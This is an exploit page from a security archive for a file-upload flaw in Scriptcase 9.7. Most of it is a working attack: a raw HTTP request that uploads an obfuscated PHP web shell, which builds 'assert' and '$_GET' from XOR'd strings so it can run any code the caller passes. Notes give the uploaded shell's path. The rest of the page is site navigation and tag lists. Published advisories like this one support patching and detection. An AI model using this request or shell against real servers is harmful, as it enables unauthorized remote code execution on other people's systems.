Home[1] Files[2] News[3] Contact[4] Add New[5]
- Scriptcase 9.7 Shell Upload[6]
- Authored by luckyt0mat0[7]
-
Scriptcase version 9.7 suffers from a remote shell upload vulnerability.
- MD5 |
1a68d2be31fdc3bda2232ba70472bcb0
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
# Exploit Title: Scriptcasr 9.7 arbitrary file upload getshell
# Date: 2022-04-08
# Exploit Author: luckyt0mat0
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 9.7
# Tested on: Windows Server 2019
# Proof of Concept:
POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
Host: 10.50.1.214:8091
Content-Length: 570
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Origin: http://10.50.1.214:8091
Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
Connection: close
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="jqul_csrf_token"
gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="files[]"; filename="123.php"
Content-Type: text/html
<?php
error_reporting(0);
$a = rad2deg^(3).(2);
$b = asin^(2).(6);
$c = ceil^(1).(1);
$exp = $a.$b.$c; //assert
$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
$pi=$$pi; //$_GET
call_user_func($exp,$pi{0}($pi{1}));
?>
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ———
# Notes:
- PHPSESSID is - be1281e8cde9348d284c3074c9bea53e
- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php
File Tags
- ActiveX[18] (932)
- Advisory[19] (77,145)
- Arbitrary[20] (15,041)
- BBS[21] (2,859)
- Bypass[22] (1,548)
- CGI[23] (1,010)
- Code Execution[24] (6,617)
- Conference[25] (668)
- Cracker[26] (797)
- CSRF[27] (3,267)
- DoS[28] (21,712)
- Encryption[29] (2,326)
- Exploit[30] (49,609)
- File Inclusion[31] (4,142)
- File Upload[32] (937)
- Firewall[33] (821)
- Info Disclosure[34] (2,542)
- Intrusion Detection[35] (847)
- Java[36] (2,766)
- JavaScript[37] (791)
- Kernel[38] (5,982)
- Local[39] (13,967)
- Magazine[40] (586)
- Overflow[41] (12,118)
- Perl[42] (1,410)
- PHP[43] (5,037)
- Proof of Concept[44] (2,276)
- Protocol[45] (3,279)
- Python[46] (1,384)
- Remote[47] (29,566)
- Root[48] (3,440)
- Ruby[49] (574)
- Scanner[50] (1,629)
- Security Tool[51] (7,662)
- Shell[52] (3,051)
- Shellcode[53] (1,201)
- Sniffer[54] (879)
- Spoof[55] (2,076)
- SQL Injection[56] (15,968)
- TCP[57] (2,349)
- Trojan[58] (669)
- UDP[59] (866)
- Virus[60] (657)
- Vulnerability[61] (30,346)
- Web[62] (8,954)
- Whitepaper[63] (3,709)
- x86[64] (942)
- XSS[65] (17,283)
- Other[66]
File Archives
- July 2022[67]
- April 2022[68]
- March 2022[69]
- February 2022[70]
- January 2022[71]
- December 2021[72]
- November 2021[73]
- October 2021[74]
- September 2021[75]
- August 2021[76]
- July 2021[77]
- June 2021[78]
- Older[79]
Systems
- AIX[80] (424)
- Apple[81] (1,875)
- BSD[82] (368)
- CentOS[83] (55)
- Cisco[84] (1,911)
- Debian[85] (5,947)
- Fedora[86] (1,690)
- FreeBSD[87] (1,241)
- Gentoo[88] (4,152)
- HPUX[89] (876)
- iOS[90] (317)
- iPhone[91] (108)
- IRIX[92] (220)
- Juniper[93] (67)
- Linux[94] (41,839)
- Mac OS X[95] (683)
- Mandriva[96] (3,105)
- NetBSD[97] (255)
- OpenBSD[98] (478)
- RedHat[99] (11,301)
- Slackware[100] (941)
- Solaris[101] (1,605)
- SUSE[102] (1,444)
- Ubuntu[103] (7,724)
- UNIX[104] (9,043)
- UnixWare[105] (183)
- Windows[106] (6,352)
- Other[107]
- Services
- Security Services[118]
- Hosting By
- Rokasec[119]
Read more https://packetstormsecurity.com/files/166764/scriptcase97-exec.txt